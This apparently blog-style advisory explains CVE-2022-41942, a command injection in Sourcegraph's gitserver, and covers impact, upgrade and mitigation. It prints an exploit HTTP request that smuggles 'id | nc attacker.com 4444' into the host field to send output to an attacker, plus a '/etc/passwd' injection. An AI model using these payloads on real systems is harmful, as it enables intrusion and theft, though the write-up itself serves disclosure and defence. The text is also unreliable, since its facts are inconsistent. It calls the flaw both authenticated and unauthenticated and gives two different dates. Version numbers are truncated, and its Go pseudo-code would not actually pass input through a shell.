CVE-2022-41942 - Command Injection in Sourcegraph gitserver Lets Attackers Run Code in the Container
On October 28, 2022, a new vulnerability (CVE-2022-41942) was publicly disclosed affecting Sourcegraph, a leading code intelligence platform used by developers and companies all over the world. If you are running Sourcegraph in your organization, especially a version older than 4.1., you need to be aware of this issue—a command injection flaw in the gitserver service that makes it possible for attackers to execute arbitrary commands in the container.
In this deep dive, we’ll break down what the vulnerability is, how it happens, exploitation details, and what you can do about it.
What is Sourcegraph?
Sourcegraph helps developers search, navigate and understand large codebases. It is popular in both small startups and large corporations. Its architecture includes several microservices, with gitserver being responsible for repository cloning, fetching, and related operations.
What is CVE-2022-41942?
CVE-2022-41942 is an authenticated command injection vulnerability in Sourcegraph’s gitserver, specifically in the /list-gitolite API endpoint. If exploited, it allows an attacker to execute arbitrary shell commands inside the gitserver Docker container or server.
Service: gitserver
- Endpoint: /list-gitolite
Requirement for Exploitation: Must be able to send local requests to gitserver.
- Fixed in: 4.1. release
How the Bug Happens
The vulnerable endpoint accepts a host parameter, which was directly included in a shell command, without sanitizing or properly restricting its content. This classic security issue, called command injection, happens when an attacker’s input is used as part of an OS command and not properly escaped or validated.
Example vulnerable code (pseudo-code for demonstration)
// GO PSEUDO-CODE - This is NOT the actual Sourcegraph code
inputHost := request.FormValue("host")
cmd := exec.Command("ssh", inputHost, "info")
output, err := cmd.CombinedOutput()
//.. return output to user
However, if inputHost included something like somehost; cat /etc/passwd, the shell will execute cat /etc/passwd as well as ssh somehost info, resulting in code execution.
Exploit Example
Here’s how an attacker could exploit this flaw. Assumption: the attacker can make HTTP requests to the gitserver service, which usually listens on an internal network.
Attack HTTP POST request
POST /list-gitolite HTTP/1.1
Host: gitserver.internal:3178
Content-Type: application/json
{
"host": "trustedhost; id | nc attacker.com 4444 #"
}
- The host parameter is manipulated such that after the legitimate part (trustedhost), a semicolon (;) splits off a shell command.
- In this example, (id | nc attacker.com 4444) would send the output of the id command to the attacker’s external server.
Potential Impact
- Exfiltrate sensitive files (e.g., reading /etc/passwd)
Runs as whatever user gitserver container uses (often root or a privileged UID)
- No authentication on the endpoint itself—just obscurity/internal networking protects it
How to Fix It?
Upgrade to Sourcegraph 4.1. or later
The Sourcegraph team addressed this issue by adding proper validation and escaping to the host parameter, preventing command injection.
- Sourcegraph security advisory: GHSA-64r9-65wq-rcg6
- Release notes: Sourcegraph v4.1.
- Commit diff: GitHub Commit with Patch
If you absolutely cannot upgrade immediately, consider
- Blocking access to the /list-gitolite endpoint from all but trusted IPs
Conclusion
CVE-2022-41942 is a serious security bug that could allow intruders to run arbitrary commands in a very sensitive Sourcegraph service. But it can only be exploited if your Gitserver is accessible to the attacker—so be sure to check your network posture as well as your Sourcegraph version.
References
- GitHub Advisory GHSA-64r9-65wq-rcg6
- Sourcegraph 4.1. Release Notes
- NVD Entry: CVE-2022-41942
[ ] Is your Sourcegraph version >= 4.1.?
- [ ] Is your gitserver accessible only to safe networks/applications?
Timeline
Published on: 11/22/2022 19:15:00 UTC
Last modified on: 11/26/2022 03:30:00 UTC